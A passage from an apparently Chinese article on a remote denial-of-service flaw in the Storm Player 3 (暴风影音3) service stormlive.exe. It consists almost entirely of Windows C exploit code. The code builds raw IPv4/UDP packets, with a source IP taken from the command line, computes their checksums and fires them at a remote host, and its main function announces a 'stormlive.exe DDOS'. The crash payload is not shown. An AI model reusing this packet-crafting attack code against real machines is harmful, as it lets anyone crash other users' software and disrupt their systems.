chksumlen += sizeof(udphdr->src_portno);

// UDP destination port

memcpy(ptr, &udphdr->dst_portno, sizeof(udphdr->dst_portno));

ptr += sizeof(udphdr->dst_portno);

chksumlen += sizeof(udphdr->dst_portno);

// UDP length again

memcpy(ptr, &udphdr->udp_length, sizeof(udphdr->udp_length));

ptr += sizeof(udphdr->udp_length);

chksumlen += sizeof(udphdr->udp_length);

// 16-bit UDP checksum, zero

memcpy(ptr, &zero, sizeof(unsigned short));

ptr += sizeof(unsigned short);

chksumlen += sizeof(unsigned short);

// payload

memcpy(ptr, payload, payloadlen);

ptr += payloadlen;

chksumlen += payloadlen;

// pad to next 16-bit boundary

for(i=0 ; i < payloadlen%2 ; i++, ptr++)

{

printf("pad one byte\n");

*ptr = 0;

ptr++;

chksumlen++;

}

// Compute the checksum and put it in the UDP header

udphdr->udp_checksum = checksum((USHORT *)buf, chksumlen);

return;

}

第4页：暴风影音3 爆远程拒绝服务漏洞4

//

// Function: InitUdpHeader

//

// Description:

// Setup the UDP header which is fairly simple. Grab the ports and

// stick in the total payload length.

//

int InitUdpHeader(

char *buf,

int srcprt,

int dstprt,

int payloadlen

)

{

UDP_HDR *udphdr=NULL;

udphdr = (UDP_HDR *)buf;

udphdr->src_portno = htons(srcprt);

udphdr->dst_portno = htons(dstprt);

udphdr->udp_length = htons(sizeof(UDP_HDR) + payloadlen);

return sizeof(UDP_HDR);

}

//

// Function: sendudp

//

// Description:

// Send the udp packets with RAW SOCKET

//

int sendudp(char *srcip, char *dstip, int srcprt, int dstprt, char *buf, int bufsize)

{

WSADATA wsd;

SOCKET s;

char sendbuf[0x10000]={0};

int iphdrlen,

allsize,

udphdrlen;

int optlevel,

option,

optval,

rc;

SOCKADDR_IN ReceiverAddr;

ReceiverAddr.sin_family = AF_INET;

ReceiverAddr.sin_port = htons(dstprt);

ReceiverAddr.sin_addr.s_addr = inet_addr(dstip);

allsize = sizeof(IPV4_HDR) + sizeof(UDP_HDR) + bufsize;

if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)

{

printf("WSAStartup() failed: %d\n", GetLastError());

return -1;

}

s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);

if (s == INVALID_SOCKET)

{

fprintf(stderr, "socket failed: %d\n", WSAGetLastError());

return -1;

}

// Enable the IP header include option

optval = 1;

optlevel = IPPROTO_IP;

option = IP_HDRINCL;

rc = setsockopt(s, optlevel, option, (char *)&optval, sizeof(optval));

if (rc == SOCKET_ERROR)

{

fprintf(stderr, "setsockopt: IP_HDRINCL failed: %d\n", WSAGetLastError());

return -1;

}

第5页：暴风影音3 爆远程拒绝服务漏洞5

// Initialize the v4 header

iphdrlen = InitIpv4Header(

sendbuf,

srcip,

dstip,

bufsize

);

// Initialize the UDP header

udphdrlen = InitUdpHeader(

&sendbuf[iphdrlen],

srcprt,

dstprt,

bufsize

);

// Compute the UDP checksum

ComputeUdpPseudoHeaderChecksumV4(

sendbuf,

(UDP_HDR *)&sendbuf[iphdrlen],

buf,

bufsize

);

// Copy the payload to the end of the header

memcpy(&sendbuf[iphdrlen + udphdrlen], buf, bufsize);

rc = sendto(

s,

sendbuf,

allsize,

0,

(const struct sockaddr*)&ReceiverAddr,

sizeof(ReceiverAddr)

);

if (rc == SOCKET_ERROR)

{

printf("sendto() failed: %d\n", WSAGetLastError());

}

else

{

printf("sent %d bytes\n", rc);

}

closesocket(s) ;

WSACleanup() ;

return 0;

}

int main(int argc, char **argv)

{

if (argc < 3) {

printf("%s <LOCAL ip> <Remote ip>\n", argv[0]);

return 0;

}

printf("\n 暴风影音3 stormlive.exe DDOS \n");